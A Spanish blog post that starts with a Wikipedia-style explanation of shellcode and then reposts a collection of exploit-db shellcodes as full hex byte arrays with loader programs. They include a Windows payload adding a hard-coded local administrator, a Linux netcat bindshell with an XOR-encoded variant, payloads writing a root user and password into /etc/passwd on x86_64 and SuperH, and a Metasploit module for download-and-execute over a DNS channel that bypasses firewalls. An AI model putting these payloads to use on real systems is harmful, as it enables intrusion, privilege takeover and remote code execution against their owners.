WIKI: http://es.wikipedia.org/wiki/Shellcode
Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador y trasladadas a opcodes que suelen ser inyectadas en la pila (o stack) de ejecución de un programa para conseguir que la máquina en la que reside se ejecute la operación que se haya programado.
El término shellcode deriva de su propósito general, esto era una porción de un exploit utilizada para obtener una shell. Este es actualmente el propósito más común con que se utilizan.
Para crear una shellcode generalmente suele utilizarse un lenguaje de más alto nivel, como es el caso del lenguaje C, para luego, al ser compilado, generar el código de máquina correspondiente, que es denominado opcode.
Un ejemplo de una shellcode escrita en C:
#include
int main() {
char *scode[2];
scode[0] = "/bin/sh";
scode[1] = NULL;
execve (scode[0], scode, NULL);
}
Esta shellcode, que ejecuta la shell /bin/sh, se vale de la llamada al sistema execve para realizar la ejecución de la shell contenida dentro del array scode. Si analizamos esto en lenguaje ensamblador el funcionamiento es simple: la llamada al sistema específica es cargada detro del registro EAX, los argumentos de la llamada al sistema son puestos en otros registros, se ejecuta la instrucción int 0x80 (que producirá la llamada al sistema) para la creación del proceso (pueder hacerse tanto con fork() como con system()), la CPU cambiará ahora al kernel mode (supervisor - ring 0), y la llamada al sistema será ejecutada para así devolver, en este caso, una shell /bin/sh. Si compilamos y ejecutamos esto, obtendremos:
$: gcc -static scode.c -o scode
$: ./scode
sh-3.2$
Para obtener el código máquina se desensambla el archivo ya compilado (binario). Pueden utilizarse diversas aplicaciones para esta tarea, entre ellas una de las más populares para sistemas del tipo Unix, es objdump.
$: objdump -d scode
080483a4
80483a4: 55 push %ebp
80483a5: 89 e5 mov %esp,%ebp
80483a7: 83 e4 f0 and $0xfffffff0,%esp
80483aa: 83 ec 20 sub $0x20,%esp
80483ad: c7 44 24 18 a0 84 04 movl $0x80484a0,0x18(%esp)
80483b4: 08
80483b5: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp)
80483bc: 00
80483bd: 8b 44 24 18 mov 0x18(%esp),%eax
80483c1: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
80483c8: 00
80483c9: 8d 54 24 18 lea 0x18(%esp),%edx
80483cd: 89 54 24 04 mov %edx,0x4(%esp)
80483d1: 89 04 24 mov %eax,(%esp)
80483d4: e8 ff fe ff ff call 80482d8
80483d9: c9 leave
80483da: c3 ret
80483db: 90 nop
En el siguiente ejemplo se muestra una shellcode contenida en un array de un programa escrito en lenguaje C:
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x46" /* movl $0x46,%al */
"\xcd\x80" /* int $0x80 */
"\x50" /* pushl %eax */
"\x68""/ash" /* pushl $0x6873612f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
Así tenemos que una shellcode es código máquina escrito en notación hexadecimal. Posteriormente se utilizan dentro de programas escritos en C, como en el siguiente shellcode de ejemplo:
// shellcode.c
// compilar con gcc shellcode.c -o shellcode
void main()
{
((void(*)(void))
{
"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9"
"\xb0\x04\xb3\x01\x59\xb2\x21\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"
"\xff\xff\x76\x69\x73\x69\x74\x61\x20\x68"
"\x74\x74\x70\x3a\x2f\x2f\x68\x65\x69\x6e"
"\x7a\x2e\x68\x65\x72\x6c\x69\x74\x7a\x2e"
"\x63\x6c\x20\x3d\x29"
}
)();
}
Las shellcodes deben ser cortas para poder ser inyectadas dentro de la pila, que generalmente suele ser un espacio reducido.
Las shellcodes se utilizan para ejecutar código aprovechando ciertas vulnerabilidades en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.
Es común que en la compilación de una shellcode se produzcan bytes nulos, los cuales deben ser eliminados de la misma, ya que frenarían la ejecución de la shellcode. Para ello el programador se vale de diversas técnicas, como remplazar las instrucciones que genera bytes NULL por otras que no lo hagan o realizar una operación XOR, mover hacia registros más pequeños (como AH, AL), y de esta forma permitir que la shellcode sea realmente inyectable.
-------------------------------------------------------------------------------------
Ahora Comprato unos Shellcodes muy interesantes =)
http://www.exploit-db.com/exploits/15202/
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include
#include
#include
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}
-------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/17194/
Linux/x86 - netcat bindshell port 6666 - 69 bytes
/*
** Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes
** Date: 2011-04-20
** Author: Jonathan Salwan
**
** http://shell-storm.org
** http://twitter.com/jonathansalwan
**
** /usr/bin/netcat -ltp6666 -e/bin/sh
**
** 8048054 <.text>:
** 8048054: 31 c0 xor %eax,%eax
** 8048056: 50 push %eax
** 8048057: 68 74 63 61 74 push $0x74616374
** 804805c: 68 6e 2f 6e 65 push $0x656e2f6e
** 8048061: 68 72 2f 62 69 push $0x69622f72
** 8048066: 68 2f 2f 75 73 push $0x73752f2f
** 804806b: 89 e3 mov %esp,%ebx
** 804806d: 50 push %eax
** 804806e: 68 36 36 36 36 push $0x36363636
** 8048073: 68 2d 6c 74 70 push $0x70746c2d
** 8048078: 89 e2 mov %esp,%edx
** 804807a: 50 push %eax
** 804807b: 68 6e 2f 73 68 push $0x68732f6e
** 8048080: 68 2f 2f 62 69 push $0x69622f2f
** 8048085: 66 68 2d 65 pushw $0x652d
** 8048089: 89 e1 mov %esp,%ecx
** 804808b: 50 push %eax
** 804808c: 51 push %ecx
** 804808d: 52 push %edx
** 804808e: 53 push %ebx
** 804808f: 89 e6 mov %esp,%esi
** 8048091: b0 0b mov $0xb,%al
** 8048093: 89 f1 mov %esi,%ecx
** 8048095: 31 d2 xor %edx,%edx
** 8048097: cd 80 int $0x80
**
*/
#include
#include
char SC[] = "\x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f"
"\x6e\x65\x68\x72\x2f\x62\x69\x68\x2f\x2f\x75"
"\x73\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d"
"\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1"
"\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31"
"\xd2\xcd\x80";
/* SC polymorphic - XOR 19 - 93 bytes */
char SC_ENC[] = "\xeb\x11\x5e\x31\xc9\xb1\x45\x80\x74\x0e"
"\xff\x13\x80\xe9\x01\x75\xf6\xeb\x05\xe8"
"\xea\xff\xff\xff\x22\xd3\x43\x7b\x67\x70"
"\x72\x67\x7b\x7d\x3c\x7d\x76\x7b\x61\x3c"
"\x71\x7a\x7b\x3c\x3c\x66\x60\x9a\xf0\x43"
"\x7b\x25\x25\x25\x25\x7b\x3e\x7f\x67\x63"
"\x9a\xf1\x43\x7b\x7d\x3c\x60\x7b\x7b\x3c"
"\x3c\x71\x7a\x75\x7b\x3e\x76\x9a\xf2\x43"
"\x42\x41\x40\x9a\xf5\xa3\x18\x9a\xe2\x22"
"\xc1\xde\x93";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
-------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/18585/
Linux x86_64 - add user with passwd (189 bytes)
;sc_adduser01.S
;Arch: x86_64, Linux
;
;Author: 0_o -- null_null
; nu11.nu11 [at] yahoo.com
;Date: 2012-03-05
;
;compile an executable: nasm -f elf64 sc_adduser.S
; ld -o sc_adduser sc_adduser.o
;compile an object: nasm -o sc_adduser_obj sc_adduser.S
;
;Purpose: adds user "t0r" with password "Winner" to /etc/passwd
;executed syscalls: setreuid, setregid, open, write, close, exit
;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash
;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h
BITS 64
[SECTION .text]
global _start
_start:
;sys_setreuid(uint ruid, uint euid)
xor rax, rax
mov al, 113 ;syscall sys_setreuid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;sys_setregid(uint rgid, uint egid)
xor rax, rax
mov al, 114 ;syscall sys_setregid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;push all strings on the stack prior to file operations.
xor rbx, rbx
mov ebx, 0x647773FF
shr rbx, 8
push rbx ;string \00dws
mov rbx, 0x7361702f6374652f
push rbx ;string sap/cte/
mov rbx, 0x0A687361622F6EFF
shr rbx, 8
push rbx ;string \00\nhsab/n
mov rbx, 0x69622F3A746F6F72
push rbx ;string ib/:toor
mov rbx, 0x2F3A3A303A303A67
push rbx ;string /::0:0:g
mov rbx, 0x46556B554B587435
push rbx ;string FUkUKXt5
mov rbx, 0x546755333A723074
push rbx ;string TgU3:r0t
;prelude to doing anything useful...
mov rbx, rsp ;save stack pointer for later use
push rbp ;store base pointer to stack so it can be restored later
mov rbp, rsp ;set base pointer to current stack pointer
;sys_open(char* fname, int flags, int mode)
sub rsp, 16
mov [rbp - 16], rbx ;store pointer to "t0r..../bash"
mov si, 0x0401 ;arg 2 -- flags
mov rdi, rbx
add rdi, 40 ;arg 1 -- pointer to "/etc/passwd"
xor rax, rax
mov al, 2 ;syscall sys_open
syscall
;sys_write(uint fd, char* buf, uint size)
mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"
xor rdx, rdx
mov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash\00"
mov rsi, rcx ;arg 2 -- move to source index register
mov rdi, rax ;arg 1 -- move to destination index register
xor rax, rax
mov al, 1 ;syscall sys_write
syscall
;sys_close(uint fd)
xor rdi, rdi
mov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index register
xor rax, rax
mov al, 3 ;syscall sys_close
syscall
;sys_exit(int err_code)
xor rax, rax
mov al, 60 ;syscall sys_exit
xor rbx, rbx ;arg 1 -- error code
syscall
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
;
;equivalent code:
;
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
-------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/17439/
SuperH (sh4) Add root user with password
/*
** Title: Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date: 2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
** Informations:
** -------------
** - user: shell-storm
** - pswd: toor
** - uid : 0
**
** open:
** mov #5, r3
** mova @(130, pc), r0
** mov r0, r4
** mov #255, r13
** mov #4, r12
** mul.l r13, r12
** sts macl, r5
** add #69, r5
** mov #84, r13
** mov #5, r12
** mul.l r13, r12
** sts macl, r6
** trapa #2
** mov r0, r11
**
** write:
** xor r6, r6
** xor r5, r5
** mov #4, r3
** mov r11, r4
** mova @(20, pc), r0
** mov r0, r5
** mov #72, r6
** trapa #2
**
** close:
** mov #6, r3
** mov r11, r4
** trapa #2
**
** exit:
** mov #1, r3
** xor r4, r4
** trapa #2
**
** user:
** .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"
**
** file:
** .string "@@@/etc/passwd"
**
**
** The '@@@' is just for alignment.
**
*/
#include
#include
char *SC =
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x05\xe3\x20\xc7\x03\x64\xff\xed"
"\x04\xec\xd7\x0c\x1a\x05\x45\x75"
"\x54\xed\x05\xec\xd7\x0c\x1a\x06"
"\x02\xc3"
/* r11 = fd */
"\x03\x6b"
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x6a\x26\x5a\x25\x04\xe3\xb3\x64"
"\x04\xc7\x03\x65\x48\xe6\x02\xc3"
/* close(fd) */
"\x06\xe3\xb3\x64\x02\xc3"
/* exit(0) */
"\x01\xe3\x4a\x24\x02\xc3"
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74"
"\x6f\x72\x6d\x3a\x24\x31\x24\x4b"
"\x51\x59\x6c\x2f\x79\x72\x75\x24"
"\x50\x4d\x74\x30\x32\x7a\x55\x54"
"\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30"
"\x3a\x30\x3a\x72\x6f\x6f\x74\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"
"\x69\x6e\x2f\x62\x61\x73\x68\x5c"
"\x6e"
/* @@@/etc/passwd */
"\x40\x40\x40\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x73\x77\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
-----------------------------------------------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/17326/
DNS Reverse Download and Exec Shellcode
http://www.exploit-db.com/exploits/17326/
DNS Reverse Download and Exec Shellcode
##
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74
\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78
\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33
\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73
\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF
\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e
\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B
\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F
\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46
\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4
\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54
\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24
\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50
\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57
\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24
\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff
\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10
\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B
\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b
\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33
\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66
\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04
\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8
\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61
\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40
\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05
\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33
\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
extLen=extens.length
while extens.length<4 div="div">
extens=extens+"\x01"
end
i=0
while i
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
while domain.length<10 div="div">
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
2 comentarios:
Excelente artículo, un aporte genial muchas gracias XD
Gracias Compañero =)
Publicar un comentario